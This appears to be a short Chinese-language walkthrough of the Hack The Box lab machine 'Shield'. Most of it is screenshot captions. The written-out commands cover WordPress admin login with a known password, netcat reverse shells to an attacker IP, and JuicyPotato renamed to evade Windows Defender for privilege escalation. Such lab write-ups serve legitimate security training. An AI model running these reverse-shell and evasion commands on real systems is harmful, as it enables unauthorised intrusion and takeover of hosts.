文章目录

Shield

扫描文件

[渗透测试]HTB靶机-Shield_上传

神奇的出来个这个

[渗透测试]HTB靶机-Shield_上传文件_02


扫描发现存在wordpress站点

[渗透测试]HTB靶机-Shield_上传文件_03


用​​admin/P@s5w0rd!​​成功登陆后台

[渗透测试]HTB靶机-Shield_上传文件_04


发现存在漏洞的

[渗透测试]HTB靶机-Shield_上传_05


后面发现可以直接用msf来利用,完美的

[渗透测试]HTB靶机-Shield_上传_06


换个目录方便我上传文件

[渗透测试]HTB靶机-Shield_上传文件_07


接下来​​cd C:/inetpub/wwwroot/wordpress/wp-content/uploads​

[渗透测试]HTB靶机-Shield_上传_08


刚刚发现文件放错地方了重新来一下

[渗透测试]HTB靶机-Shield_上传_09


执行​​execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"​

成功接收到shell

[渗透测试]HTB靶机-Shield_上传文件_10


接下来上传​​upload JuicyPotato.exe​​,利用MS16-075提权,网上wp说防止被windows defender拿下

​mv JuicyPotato.exe js.exe​

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.8 1111 > shell.bat

接下来机器开启nc监听等待提权返回

js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\she.bat -l 1337

成功提权

[渗透测试]HTB靶机-Shield_上传_11